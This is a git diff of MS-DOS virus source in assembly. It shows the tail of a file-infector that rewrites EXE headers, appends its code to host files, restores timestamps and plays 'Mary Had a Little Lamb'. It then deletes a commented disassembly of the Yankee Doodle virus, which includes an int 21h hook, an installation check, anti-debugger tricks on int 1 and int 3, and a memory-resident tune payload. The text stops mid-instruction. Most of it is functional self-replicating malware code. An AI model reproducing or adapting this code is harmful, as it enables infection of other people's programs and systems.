buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - mov dx,ax - mov ax,4200h ;From beginning of file - int 21h ;Lseek function call - pop dx - pop bx - jnc set_buffer - jmp close_error - -set_buffer: - push bx - push dx - mov dx,offset buffer.new_data - sub dx,adjust - add dx,bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] ;Load handle - mov cx,000ch - mov ax,3f00h - int 21h ;Read function call - pop dx - pop bx - jnc read_ok - jmp close_error - -read_ok: - mov si,offset buffer.virus_stamp - mov di,offset buffer.new_data - sub si,adjust - sub di,adjust - add si,bx - add di,bx - mov cx,12 ;Length of strings to - ;compare - repe cmpsb - pushf - mov si,offset buffer.infected - sub si,adjust - add si,bx - mov word ptr [si],0000h - popf - jnz infect_it - -close_error: - mov si,offset buffer.handle - sub si,adjust - add si,bx - push bx - mov bx,[si] - mov ax,3e00h ;Close file function call - int 21h - pop bx - jmp error_exit - -infect_it: - mov si,offset buffer.infected - sub si,adjust - add si,bx - mov word ptr [si],7777h - - mov si,offset buffer.where_from_flag - sub si,adjust - add si,bx - mov ax,[si] - sub si,2 - mov [si],ax ;This code effectively moves - ;where_from_flag into help_flag - - add si,2 - mov [si],5a5ah ;Ready to infect - push bx - push dx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - xor cx,cx - xor dx,dx - mov ax,4200h ;From beginning of file - int 21h ;Lseek function call - pop dx - pop bx - jnc set_new_data - jmp append_ok - -set_new_data: - push bx - push dx - mov dx,offset buffer.new_data - sub dx,adjust - add dx,bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] ;Load handle - mov cx,001bh ;Read formatted exe header - mov ax,3f00h - int 21h ;Read function call - pop dx - pop bx - jnc read_header - jmp append_ok - -read_header: - nop ;some code to modify header - ; - - mov si,offset buffer.pointer5 - sub si,adjust - add si,bx - mov ax,[si] - add si,2 - add ax,0ch - adc word ptr [si],0000h - sub si,2 - mov [si],ax ;This code restores original - ;filelength - - mov si,offset buffer.new_data - sub si,adjust - add si,bx - mov ax,[si] - cmp ax,5a4dh ;check for valid exe file - jz valid_exe - jmp append_ok - -valid_exe: - mov ax,[si+8] ;Load module size - xor dx,dx - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 ;Multiply by 16 - - push ax - push dx ;Adjust new size - push cx - mov dx,virussize-896+64 - push dx - mov cx,0009h - shr dx,cl - add word ptr [si+4],dx - pop dx - and dx,01ffh - add dx,word ptr [si+2] - cmp dx,512 - jl adjust_okay - sub dx,512 - inc word ptr [si+4] -adjust_okay: - mov word ptr [si+2],dx - pop cx - pop dx - pop ax - - - push si ;This SI is very useful so save it - - mov si,offset buffer.pointer5 - sub si,adjust - add si,bx - sub [si],ax - mov ax,[si] - sbb [si+2],dx - mov dx,[si+2] ;the byte size of the load module - - - pop si - push ax - push dx - mov ax,[si+14h] - mov dx,[si+16h] ;Get CS:IP value - mov cx,[si+0eh] ;Get SS value - push si - mov si,offset buffer.IP_save - sub si,adjust - add si,bx - xchg [si],ax - xchg [si+2],dx - mov si,offset buffer.SS_save - sub si,adjust - add si,bx - xchg [si],cx - mov si,offset buffer.ip_old - sub si,adjust - add si,bx - mov [si],ax - mov [si+2],dx - mov si,offset buffer.ss_old - sub si,adjust - add si,bx - mov [si],cx - pop si - pop dx - pop ax - - push ax - push dx - - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 ;Multiply by 16 - - mov cx,0008h - shl dx,cl - mov cx,0004h - shr ax,cl ;A very obscure algorithm to make - ;a segment:offset pair - mov [si+14h],ax - mov [si+16h],dx ;Infected values - - push si - mov si,offset buffer.far_push - sub si,adjust - add si,bx - xchg [si],dx - mov word ptr [si+2],dx - pop si - - pop dx - pop ax - add ax,virussize ; - adc dx,0000h - - mov cx,0003h -mul_loop: - - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 ;Multiply by 4096 - loop mul_loop - - or ax,ax - jz exact_value - inc dx -exact_value: - mov [si+0eh],dx ;Infected stack segment - - ;Write back infected header - push si - push bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - mov ax,5700h ;Get time function - int 21h - pop bx - pop si - jnc correct_time - jmp append_ok1 - -correct_time: - push cx - push bx - push dx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - xor cx,cx - xor dx,dx - mov ax,4200h ;From beginning of file - int 21h ;Lseek function call - pop dx - pop bx - pop cx - jnc continue_infection - jmp append_ok1 - -continue_infection: - - push cx - push dx - push bx - mov dx,offset buffer.new_data - sub dx,adjust - add dx,bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] ;Load handle - mov cx,001bh ;Write infected exe header - mov ax,4000h - int 21h ;Write function call - pop bx - pop dx - pop cx - jnc glue_virus - jmp append_ok1 - -glue_virus: - - push cx - push bx - push dx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - xor cx,cx - xor dx,dx - mov ax,4202h ;From the end of file - int 21h ;Lseek function call - pop dx - pop bx - pop cx - jnc write_data - jmp append_ok1 - -write_data: - - mov si,offset buffer.handle - sub si,adjust - add si,bx - - push dx - push cx - - mov dx,bx - sub dx,3 ;The starting three byte - ;call instruction - push es - push bx - push dx - push si - mov ax,2f00h - int 21h - pop si - pop dx - - push es - push bx - - push si - mov ax,1a00h - int 21h - pop si - - - mov bx,[si] ;Load handle - mov cx,virussize-896+64 ;Length of virus obtained - mov ax,4000h ;with dir - int 21h - lahf ;Write function call - - pop bx - pop es - - push ds - push es - pop ds - mov dx,bx - push ax - mov ax,1a00h - int 21h - pop ax - - pop ds - pop bx - pop es - - pop cx - pop dx - - sahf - jnc put_stamp ;Error or not file - jmp append_ok1 ;is closed - -put_stamp: - push bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - mov ax,5701h ;Set time function - int 21h - pop bx - -append_ok1: - - mov si,offset buffer.ip_old ;Restore previous CS:IP values - sub si,adjust - add si,bx - mov ax,[si] - mov dx,[si+2] - mov si,offset buffer.IP_save - sub si,adjust - add si,bx - mov [si],ax - mov [si+2],dx - - mov si,offset buffer.save_push - sub si,adjust - add si,bx - mov ax,[si] - mov word ptr [si-2],ax - - mov si,offset buffer.ss_old - sub si,adjust - add si,bx - mov ax,[si] - mov si,offset buffer.SS_save - sub si,adjust - add si,bx - mov word ptr [si],ax - - -append_ok: - mov si,offset buffer.help_flag - sub si,adjust - add si,bx - mov ax,[si] - add si,2 - mov [si],ax ;This code effectively moves - ;help_flag into where_from_flag - - - jmp close_error ; - -error_exit: - mov si,offset buffer.pointer3 - sub si,adjust - add si,bx - mov dx,[si] ;Restore original DTA - add si,2 - mov ax,[si] - push ds - mov ds,ax - mov ax,1a00h ;Set DTA function call - int 21h - pop ds - pop di - pop si - pop dx - pop cx - pop bx - pop ax - ret - -try_to_infect ENDP - -transfer_filespec PROC - - push si - mov si,offset buffer.filematch ;Transfer name to the working - ;area - sub si,adjust - add si,bx - call byte_move - pop si - ret - -transfer_filespec ENDP - -search_all PROC - - push si - mov si,offset buffer.matchall ;This is the '*.*' filename - sub si,adjust - add si,bx - call byte_move - pop si - ret - -search_all ENDP - -byte_move PROC - - push ax - push di - - cld - -move_loop: - lodsb - stosb - or al,al ;The string to move is ASCIIZ - jne move_loop - pop di - pop ax - ret - -byte_move ENDP - -find_first PROC - - push cx - push bx - cmp dx,0000h - jnbe over_set - mov dx,offset buffer.buffer2 ;Set Data Transfer Area - sub dx,adjust ;or Disk Transfer area - add dx,bx ; -over_set: - add dx,02Bh - mov cx,00010h ;Attribute byte for - ;directory search - mov ah,01ah - int 021h ;Set DTA function call - - pop bx - push bx - push dx - mov dx,offset buffer.buffer1 - sub dx,adjust - add dx,bx - mov ah,04eh ;find first - ;function call - int 021h - pop dx - pop bx - pop cx - ret - -find_first ENDP - -find_next PROC - - push cx - push bx - push dx - mov dx,offset buffer.buffer1 - sub dx,adjust - add dx,bx - mov cx,00010h - mov ah,04fh ;Find next function call - int 021h - pop dx - pop bx - pop cx - ret - -find_next ENDP - -delay PROC - - push ax - push bx - push cx - push dx - mov ah,2ch ;Read current time - int 21h - - mov ah,ch - add al,cl - add bh,dh - add bl,dl - - cmp bl,100 - jb secs - sub bl,100 - inc bh -secs: cmp bh,60 - jb mins - sub bh,60 - inc al -mins: cmp al,60 - jb hours - sub al,60 - inc ah -hours: cmp ah,24 - jne tcheck - sub ah,ah - -tcheck: push ax - mov ah,2ch - int 21h - - pop ax - cmp cx,ax - ja tdquit - jb tcheck - cmp dx,bx - jb tcheck - -tdquit: pop dx - pop cx - pop bx - pop ax - ret - -delay ENDP - -sound PROC - - push ax - push cx - push dx - push di - - mov al,0b6h - out 43h,al - mov dx,14h - mov ax,533h*896 - div di - out 42h,al - mov al,ah - out 42h,al - in al,61h - mov ah,al - or al,3 - out 61h,al - mov al,cl - call delay - mov al,ah - out 61h,al - pop di - pop dx - pop cx - pop ax - ret - -sound ENDP - -music_play PROC - - push bx - push cx - push di - push si - push bp - -freq: - - mov di,[si] - cmp di,0ffffh - je end_play - mov bl,ds:[bp] - sub cl,cl - sub bh,bh - call sound - add si,2 - inc bp - jnz freq - -end_play: - pop bp - pop si - pop di - pop cx - pop bx - ret - -music_play ENDP - -mary_proc PROC - - push bx - push bp - - mov si,offset mary_freq - mov bp,offset mary_time - sub si,adjust - sub bp,adjust - add si,bx - add bp,bx - call music_play - - pop bp - pop bx - ret - -mary_proc ENDP - -mary_freq dw 262,262,293,329,262,329,293,196 - dw 262,262,293,329,262,262 - dw 262,262,293,329,349,329,293,262 - dw 246,196,220,246,262,262 - dw 220,246,220,174,220,246,262,220 - dw 196,220,196,174,164,174,196 - dw 220,246,220,174,220,246,262,220 - dw 196,262,246,293,262,262,0ffffh - - -mary_time db 8 dup(25) - db 4 dup(25), 50, 50 - db 8 dup(25) - db 4 dup(25), 50, 50 - db 26, 25, 26, 5 dup(25) - db 26, 25, 26, 3 dup(25), 30 - db 26, 25, 26, 4 dup(25), 30 - db 4 dup(25), 50, 50 - - - -setup_data: - cli - pop bx ;This will catch instruction pointer - push bx - sti ;value and after that restore stack - ret ;pointer value - - -buffer data_area <> ;Reseve data_area space - - - END start \ No newline at end of file diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yd23.asm b/MSDOS/Y-Index/Virus.MSDOS.Unknown.yd23.asm deleted file mode 100644 index 38e815ba..00000000 --- a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yd23.asm +++ /dev/null @@ -1,1818 +0,0 @@ -;THE YANKEE DOODLE VIRUS -;POOR DISASSEMBLY OF IT MANY REFRENCE MADE AS ABSOLUTE WHEN THEY SHOULD -;BE REFRENCE TO LOCATIONS IN PROGRAM -;WILL WORK IF NO CHANGES MADE TO CODE -;EXCUSE SOME OF THE COMMENTS WHICH MAKE NO SENSE - .RADIX 16 -INT01_OFFS EQU 0004 - -INT03_OFFS EQU 000C - -MEM_SIZE EQU 0413 -TIMER_HI EQU 006E -TIMER_LO EQU 006C - - -;****************************************************************************** -;The host program starts here. This one is a dummy that just returns control -;to DOS. -host_code SEGMENT byte - ASSUME CS:host_code, ds:host_code - ORG 0 - db 1eh dup (0) -HOST: DB 0B8H, 00H, 4CH, 0CDH - DB '!OS SYS' - DB 7,0,0,0,0 - -host_code ENDS - - - - -vgroup GROUP virus_code -virus_code SEGMENT byte - ASSUME cs:virus_code, ds:virus_code - - - -;data AREA - -TOP_VIR: db 0f4h - db 7ah - DB 2Ch ;used as a marker - -D003 DB 00 - -FSIZE1 DW 0000 ;filsize being infected -FSIZE2 DW 0223 ;in bytes hex of course - -D1 Dw 0abeh ;used as a marker - -TOP_HOST DW 5A4DH ;USED AS A FILE BUFFER - ;WHEN FILE IS EXE BELOW IS TRUE - ;SIGANATURE -P_SIZE DW 0023 ;LAST PAGE SIZE -P_COUNT DW 0002 ;PAGE COUNT -RELOC DW 0000 ;RELOC TABEL ENTRIES -H_PARA DW 0020 ;#HEADER PARAGRAPHS -MINALLOC DW 0001 ;MIN ALLOC OF MEM -MAXALLOC DW 0FFFF ;MAX ALLOC OF MEM -I_SS DW 0000 ;INTIAL SS -I_SP DW 0000 ;INTIAL SP -CHECKSUM DW 0000 ;CHECKSUM -I_IP DW 0000 ;I_IP PRE INFECTION -I_CS DW 0000 ;I_CS -REL_OFFSET DW 003E ;RELOCATION OFFSET -O_NUM DW 0000 ;OVERLAY NUM - ;EXTRA NOT USED DURING EXE - ;HEADER READING -REM1 DB 01,00,0FBH,30 ;D0026 -;end of top_host buffer -;*********************************************************************** - -OLD_INT21_OFS DW 109E -OLD_INT21_SEG DW 0116 - -OLD_INT21_OFS2 DW 109E -OLD_INT21_SEG2 DW 0116 - -OLD_INT24_OFS DW 0155 -OLD_INT24_SEG DW 048Ah - -OLD_INT1C_OFS DW 0FF53 -OLD_INT1C_SEG DW 0F000 - -F_HANDLE DW 5 ;3A -F_TIME DW 5002 ; -F_DATE DW 1ACC ;3E - -;USED IN VIT INT 1C PART - -X1 DW 00DE ;0040 -X2 DW 006A ;0042 - -BUFFER1 DB 2E,83,3E,5E,0C -BUFFER1A DB 0F4,06,70,00 - -BUFFER2 DB 2E,83,3E,5E,0C -BUFFER2A DB 0F4,06,70,00 - -SNARE DB 00 ;0056 - -X4 DB 00 - -F_ATTR DB 20 - -PLAY_TUNE DB 01 ;0059 -REM2 DB 00 ;005A - -COMFILE DB 00 -INFEC_FL DB 00 - -CTRL_FLAG DB 00 ;5D -COUNTER DB 7BH ;5E -X7 DB 01 ;5F -X8 DW 00 ;60 - -PAGE_16 DW 0010 ; -HOST_IP DW 0100 ;FOR COM FILE INFECTIONS -EXE_PG_SIZE DW 0200 ; - -C_OFFSET_21 DW OFFSET CALL_INT21 ;2CFH - -X101 DB 0C7,11 -X10 DB 0C7,11 ; -X11 DB 0E6,0F ;006E -X12 DB 28,0E ;70 - DB 0C7,11 ;72 - DB 28,0E ;74 - DB 0E6,0F ;76 - DB 0C4,17 ;78 - - DB 0C7,11,0C7,11 ;7a - DB 0E6,0F ;7e - DB 28,0E,0C7,11 ;80 - DB 0C7,11,0C7,11 ;84 - DB 0C7,11,0E6,0F ;88 - DB 28, 0E, 59, 0Dh ;8c - DB 28,0E,0E6,0f ;90 - - - DB 0C7, 11, 0ef, 12 - DB 0C4,17 - DB 2C,15 - DB 0EF - DB 12,0C7 - DB 11,0C7 - DB 11,2C - DB 15,0EF,12 - DB 2C,15 - DB 0C5,1A - DB 2C,15 - DB 0EF - DB 012,0C7 - DB 011,2C - DB 015,0C4,17 - DB 02C,15 - DB 0C4,17 - DB 0C5,1A - DB 67 ;BA - DB 1C,0C5 - DB 1A,0C4 - DB 17 - DB 2C,15 - DB 0EF - DB 12,2C - DB 15,0C5,1A - DB 2C,15 - DB 0EF - DB 12,0C7 - DB 11,2C - DB 15,0C4,17 - DB 0C7,11,0EF,12 - DB 0E6,00FH - DB 0C7,11,0C7,11 - DB 0FF,0FF - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 09,09 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 09,09 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 05,05,06 - DB 05,05,05 - DB 05,05,05 - DB 05,06,05 - DB 05,05,05 - DB 09,09 ;115 - -NEW_PONG: - DB 0FEh, 06h, 7Ah, 7Dh ;INC BYTE PTR [7D7A] 0117 - DB 0FEH, 06, 0FBH, 7Dh ;INC BYTE PTR [7DFB] - DB 74,05 ;JZ 0126 - DB 0EA,00,7C,00,00 ;JMP 0000:7C00 - DB 0FC ;CLD - DB 33,0C0 ;XOR AX,AX - DB 8E,0C0 ;MOV ES,AX - DB 0BE, 2Ah, 7Dh ;MOV SI,7D2A - DB 0BF, 4Ch, 00 ;MOV DI,004C - DB 0A5 ;MOVSW - DB 0A5 ;MOVSW - DB 26 ;ES: - DB 83, 06, 13, 04, 02 ;ADD WORD PTR [0413],+02 - DB 0EAh, 00, 7Ch, 00, 00 ;JMP 0000:7C00 0139 - - -;DATA ENDS - -;****************************************************************** -P_MIN_MAX_ALLOC PROC NEAR -;ENTRY SI = 14H = OFFSET MINALLOC -; 16H = OFFSET MAXALLOC -;THIS PROCEDURE ALTERS THE GIVEN VALUES -;TO BE USEFULE TO THE VIRUS WHEN GOING TSR -;by editing the min and max memory requirments -;so that it doesn't need to release mem to go memory resident - - MOV AX,[SI] - SUB AX,0BBH - JB TOSMALL - - CMP AX,08 - NOP - JB TOSMALL - -EXIT_MIN_MAX: - MOV [SI],AX - RETN - -TOSMALL: - MOV AX,09 - JMP short EXIT_MIN_MAX - -P_MIN_MAX_ALLOC ENDP - -;************************************************************************* -HOOK_1_3 PROC NEAR -;CALLED BY SET_TO_HOOK1_3 -; ON ENTRY HAS DI = 44 BX= 4 -; DI = 4D BX= C -; DS = CS OF HERE BY VIR INT 1C - PUSH SI - PUSH DS - PUSH CX - - PUSH DS - POP ES ;ES POINTS HERE - - MOV DS,WORD PTR [X7 + 1] ;APPARENTLY = 0000 - ; - LDS SI,DWORD PTR [BX] ;loads DS:SI = DS:[bx] - ; - MOV WORD PTR ES:[DI+ 5],SI ; - MOV WORD PTR ES:[DI+ 7],DS ; - CMP BYTE PTR [SI],0CFH ; - JE EXIT_HOOK_1_3 ;J17D -;if we get this far hook by manliputaing the vector table -;si = vector for int1 or int3 -;int used by debug programs - - CLD - MOV CX,0005 - REPZ MOVSB - MOV BYTE PTR [SI-05],9A ;flag - MOV WORD PTR [SI-04],OFFSET anti_DEBUG ;a ip 01c3 - MOV WORD PTR [SI-02],CS ;a cs - -EXIT_HOOK_1_3: - POP CX - POP DS - POP SI - RETN -HOOK_1_3 ENDP - -;*************************************************** -SET_TO_HOOK1_3 PROC NEAR -;CALLED BY VIR INT 1CH - - PUSH BX - PUSH DI - - MOV BX,INT01_OFFS ;0004 VECTOR TO INT3 - MOV DI,OFFSET BUFFER1 ;0044 - CALL HOOK_1_3 ;SET UP HOOK INT 1 - - MOV BX,INT03_OFFS ;000C VECTOR TO INT3 - MOV DI,OFFSET BUFFER2 ;004D - CALL HOOK_1_3 ;SET UP TO HOOK INT 3 - - POP DI - POP BX - RET - -SET_TO_HOOK1_3 ENDP -;************************************************************************* - -RESTORE_1_3 PROC NEAR -;ENTRY SI = BUFFER1 ;2E,83,3E,5E,0C F4,06,70,00 -; BUFFER2 -;NOT SURE WHY BUT IT SEEMS THAT THIS CODE WILL CHECK FOR MEM LOCATION -; 0070:60F4 = 9A,01,C3 IF THERE IT WILL -;RESTORE OF BUFFER1/2 OVER THIS LOCATION WHICH WAS THE ORGINAL -; VECTOR ADDRESS INT - - PUSH CX - PUSH DI - - LES DI,DWORD PTR [SI+05] ;load this 4 bytes as a mem - ;location into es:di - ;0070:06f4 - CMP BYTE PTR ES:[DI],9A - JNE EXIT_RESTORE_1_3 - - CMP WORD PTR ES:[DI+01],OFFSET anti_DEBUG - JNE EXIT_RESTORE_1_3 - - MOV CX,5 ; MOV 5 BYTES - CLD ; FROM DS:[SI] - REPZ MOVSB ; HERE:[BUFFERX] - ; TO ES:[DI] - ; 0070:06F4 -EXIT_RESTORE_1_3: - POP DI - POP CX - RETN -RESTORE_1_3 ENDP - -;************************************************************* - -SET_TO_REST_1_3 PROC -;THIS PROCEDURE SEEMS TO RESTORE THE THE INT 1 AND 3 TO THERE PROPER -;LOCATIONS IF WE HAVE ALTERED THEM IT CHECK AND CORRECTS THEM -;IN RESTORE_1_3 -;CALLED BY VIR INT 1C - - PUSH SI - MOV SI,OFFSET BUFFER2 - CALL RESTORE_1_3 - - MOV SI,OFFSET BUFFER1 - CALL RESTORE_1_3 - - POP SI - RETN -SET_TO_REST_1_3 ENDP - -;********************************************************************** -;J01C3 -;called int 1\ used by debuggers not program is disenfected if -; int 3/ resident and td or debug is used -; BY PUTTING IN TO THE INT VECTOR FOR INT 1 OR AND INT 3 -;THE ADDRESS OF THIS SPOT -;BY HOOK_1_3 -; - -anti_DEBUG PROC ; P_01C3 - ; A - PUSH BP ; 8 - MOV BP,SP ; FLAGS 6 - PUSHF ; CS 4 - ; IP 2 - PUSH ES ; BP <-BP - PUSH DS - - PUSH BX - PUSH AX - - PUSH CS - pop DS - - CALL SET_TO_REST_1_3 ;RESTORE PROPER VECTORS - ;IF ALTERED WHICH TO GET HERE IT - ;ONE OF THEM WOULD HAVE HAD TO BEEN - - MOV AX,CS ;this test if the calling - CMP WORD PTR [BP+08],AX ;return to from this is - JE viral_cs ;J020C is our cs - - MOV DS,WORD PTR [BP+08] - CMP WORD PTR [BX+OFFSET TOP_VIR+2],2C ; THIS INFO IS LOCATED AT TOP - JNE EXIT_TO_VIR ; OF VIRUS AND MAYBE AT END AS - ; END AS WELL - CMP WORD PTR [BX+OFFSET TOP_VIR],7AF4 ; - JNE EXIT_TO_VIR ; - - ;CMP WORD PTR [BX + 0008h],0ABE - db 81, 0bf, 08, 00, 0be, 0a - JNE EXIT_TO_VIR - - MOV AX,DS ; BX /16 BY {4 SHR} - SHR BX,1 ; WHAT WAS IN BX OFFSET OF VIRUS - SHR BX,1 ; BX APPEARS TO POINT TO - SHR BX,1 ; TOP VIRUS - SHR BX,1 ; CS + IP/16 = EA - ADD AX,BX ; - MOV DS,AX ;DS = SOM EFFECTIVE ADDRESS - JMP SHORT viral_cs ; - -EXIT_TO_VIR: ;J0201 - SUB WORD PTR [BP+02],05 - POP AX - POP BX - POP DS - POP ES - POPF - POP BP - RETF - -viral_cs: - CALL P_030E - - MOV AX,WORD PTR [BP+0A] - INC BYTE PTR [REM2] ;005A IF = 0A FLAGS - TEST AX,0100 ; 08 CS - JNZ J0222 ; 06 IP - DEC WORD PTR [BP+06] ; 4 - DEC byte PTR [REM2] ;005A 2 - ; BP -J0222: - AND AX,0FEFFH ; TURNS OFF IF FLAG - MOV [BP+0A],AX ; IF ON - - PUSH CS - POP DS - CALL SET_TO_HOOK1_3 ; THIS CALL SETS UP THE - ; INTERUPTS 1 AND 3 - ; TO GO HERE IF - ; THINGS MATCH - - POP AX - POP BX - POP DS - POP ES - POPF - POP BP - ADD SP,+04 ;REMOVE LAST 2 PUSH - IRET -anti_DEBUG ENDP -;************************************************************************ - -VIR_INT_1C PROC - - PUSH BP - MOV BP,SP - PUSHF - PUSH AX - PUSH BX - PUSH DS - PUSH ES - - PUSH CS - POP DS - - CALL SET_TO_REST_1_3 ;AGAIN RESTORES 1 AND 3 INT - ; TO PROPER LOCATIONS - ;IF NEED BE - - CALL SET_TO_HOOK1_3 ;ALTERS THE 1 AND 3 INT - ; TO OUR INT HANDLER - ;IF SOMETHING IS WRONG - - MOV AX,0040 - MOV ES,AX - TEST BYTE PTR [COUNTER],07 - JNE WRONG_TIME ;J0274 - -;NOTICE THAT THIS CMP INSTRUCTIONS ARE LOOKING AT 0040: - CMP WORD PTR ES:[TIMER_HI],11 ; - JNE WRONG_TIME ;J0274 - - CMP WORD PTR ES:[TIMER_LO],00 ; - JNE WRONG_TIME ;J0274 - - MOV BYTE PTR [PLAY_TUNE],00 - MOV WORD PTR [X1],00DE ;0040 - MOV WORD PTR [X2],006A ;0042 - -WRONG_TIME: ;J0274 - CMP BYTE PTR [PLAY_TUNE],1 ;01 MEANS NO - JE EXIT_VIR_1C ;J02C4 - - CMP BYTE PTR [X4],00 ; - JE J0288 - - DEC BYTE PTR [X4] - JMP SHORT EXIT_VIR_1C - -J0288: - MOV BX,[X2] - CMP WORD PTR [BX],0FFFFH - JNE J029E - - IN AL,61 - AND AL,0FC - OUT 61,AL - MOV BYTE PTR [PLAY_TUNE],01 - - JMP short EXIT_VIR_1C - - -J029E: - MOV AL,0B6 - OUT 43,AL - MOV AX,[BX] - OUT 42,AL - MOV AL,AH - OUT 42,AL - IN AL,61 - OR AL,03 - OUT 61,AL - ADD WORD PTR [X2],+02 - MOV BX,WORD PTR [X1] - MOV AL,[BX] - DEC AL - MOV BYTE PTR [X4],AL - INC WORD PTR [X1] - -EXIT_VIR_1C: - POP ES - POP DS - POP BX - POP AX - POPF - POP BP - JMP DWORD PTR CS:[OLD_INT1C_OFS] -VIR_INT_1C ENDP -;************************************************************* -CALL_INT21: JMP DWORD PTR CS:[OLD_INT21_OFS] - -REAL_INT21: JMP DWORD PTR [OLD_INT21_OFS] - -;************************************************************* -P_02D8 PROC NEAR -;CALLED BY HANDLE_4B - PUSH BP - MOV BP,SP - CLD - PUSH [BP+0AH] - PUSH [BP+08] - PUSH [BP+04] - CALL P_09C8 - - ADD SP,+06 ;REMOVE LAST 3 PUSHES - - PUSH [BP+0CH] - PUSH [BP+06] - PUSH [BP+08] - CALL P_0A58 - - ADD SP,+06 ;REMOVE LAST 3 PUSHES - - PUSH [BP+0CH] - PUSH [BP+08] - PUSH [BP+06] - PUSH [BP+04] - CALL P_0A7F - - ADD SP,+08 - POP BP - RETN -P_02D8 ENDP -;********************************************************************** - -P_030E PROC -;CALLED BY HANDLE_4B - -;CALLED BT VIR INT 1 INT3 IN HIGH MEM -;IN INT 3 1 CASE IT SEEMS -;THAT DX= EA 0F TOP OF VIRUS POSSIBLE -;TO RETURN 5 WORDS IN STACK TOP 3 = FL,CS,IP -;BOTTOM 2 ARE THROWN OUT - - PUSH AX - PUSH BX - PUSH CX - PUSH DX - PUSH SI - PUSH DI - PUSH ES - PUSHF - CLI ;CLEAR IF - - MOV AX,8 ; - PUSH AX ;1 - - MOV AX,00AE ; - PUSH AX ;2 - - MOV AX,OFFSET VGROUP:BOT_VIR ;B40 - MOV CL,04 ; - SHR AX,CL ; - MOV DX,DS ; - ADD AX,DX ; - PUSH AX ;3 END OF VIRUS EA - - MOV AX,OFFSET J0AC0 ; 0AC0b - SHR AX,CL ; - ADD AX,DX ; - PUSH AX ;4 - - MOV AX,0060 ; - SHR AX,CL ; - ADD AX,DX ; - PUSH AX ;5 - - CALL P_02D8 - - ADD SP,0AH ;REMOVE LAST 5 PUSHES - POPF - POP ES - POP DI - POP SI - POP DX - POP CX - POP BX - POP AX - RETN -P_030E ENDP -;***************************************************************** -WRITE_FILE PROC NEAR - MOV AH,40 - jmp short r_w_int21 - -READ_FILE: - MOV AH,3F - -R_W_INT21: - CALL I21_F_HANDLE ;J035C - - JB J0357 - CMP AX,CX -J0357: RETN -WRITE_FILE ENDP -;****************************************************************** -START_FILE PROC NEAR - XOR AL,AL -MOV_F_PTR: - MOV AH,42 ;MOVE FILE PTR - -I21_F_HANDLE: - MOV BX,WORD PTR CS:[F_HANDLE] - -C2_INT21: - PUSHF - CLI ;CLEAR IF - CALL DWORD PTR CS:[OLD_INT21_OFS2] - RETN -START_FILE ENDP -;********************************************************************* - -FORCE_WRITE PROC NEAR - PUSH BX - PUSH AX - MOV BX,WORD PTR CS:[F_HANDLE] - MOV AH,45 ;GET DUPLICATE FILE HANDLE - CALL C2_INT21 - JB WRITE_ER ;J0380 - - MOV BX,AX - MOV AH,3E - CALL C2_INT21 - JMP short NO_PROBLEM - -WRITE_ER: - CLC ; CLEAR CF -NO_PROBLEM: - POP AX - POP BX - RET - -FORCE_WRITE ENDP -;****************************************************************** - -VIR_INT24: - MOV AL,03 - IRET - -HANDLE_C603: - ;THIS IS THE INSTALATION CHECK CALLED ON BY THE VIRUS - ;CHECKS TO SEE IF IN INSTALLED IN MEMORY - ;CALLED CF CLEAR, BX SET 002C, AX SET C603 - ; RETURNS - ; IF CF IS SET THEN THEN IT IS INSTALLED - ; - MOV AX,02DH - - TEST BYTE PTR CS:[X7],02 - JNZ J393 - - DEC AX - -J393: CMP BX,AX - XOR AL,AL ;ZEROS AL - - RCL AL,1 ;ROTATE LEFT THRU CARRY - ;SHIFTS AL 1 BIT TO LEFT THRU CF - ;MOVES THE CF BIT INTO AH - - PUSH AX - MOV AX,002C - TEST BYTE PTR CS:[X7],04 - JNZ J3A6 - - INC AX - -J3A6: CMP BX,AX - - - LES BX,DWORD PTR CS:OLD_INT21_OFS2 - - ;LOADS ES WITH SEGMENT - ; ADDRESS AND BX OFFSET - ; IE. ES:BX -> OLD_INT21_OFS - - POP AX ; - - INC SP ; - INC SP ; SP=SP+2 REMOVE LAST 1 PUSH - ; IE. LAST PUSHF - STI ;SET INTERUPT FLAG - RETF 2 ; RETURN TO HOST -;END HANDLE_C603 - -HANDLE_C600: -;REASON UNKNOW -; DOESN'T SEMM TO BE CALLED BY THIS VIRUS -; - MOV AX,2C - JMP short HANDLE_C5 - -HANDLE_C601: -;REASON ? -;DOESN'T SEEM TO BE CALLED BY VIRUS -; - MOV AL,BYTE PTR CS:[X7] - XOR AH,AH - JMP short HANDLE_C5 - -HANDLE_C602: -;REASON ? -;DOESN'T SEEM TO BE CALLED BY VIRUS -; - MOV BYTE PTR CS:[X7],CL - JMP SHORT HANDLE_C5 - - -VIR_INT_21 PROC - PUSHF - - CMP AH,4BH ; LOAD EXEC CALL - JZ HANDLE_4B ; LET VIRUS GO - - CMP AH,0C5 - JZ HANDLE_C5 - - CMP AX,0C600 - JZ HANDLE_C600 - - CMP AX,0C601 - JZ HANDLE_C601 - - CMP AX,0C602 - JE HANDLE_C602 - - CMP AX,0C603 - JE HANDLE_C603 - - POPF - JMP GOTO_INT21 ;NONE OF OUR INTERRUPTS LET - ;DOS INT 21 HANDLE IT - -HANDLE_C5: - POPF ; SETS THE MASKABLE INTERUPTS ON - STI ; - STC ; SETS THE CF FLAG - RETF 2 ; - -HANDLE_4B: - - PUSH AX - XOR AL,AL - XCHG AL,BYTE PTR 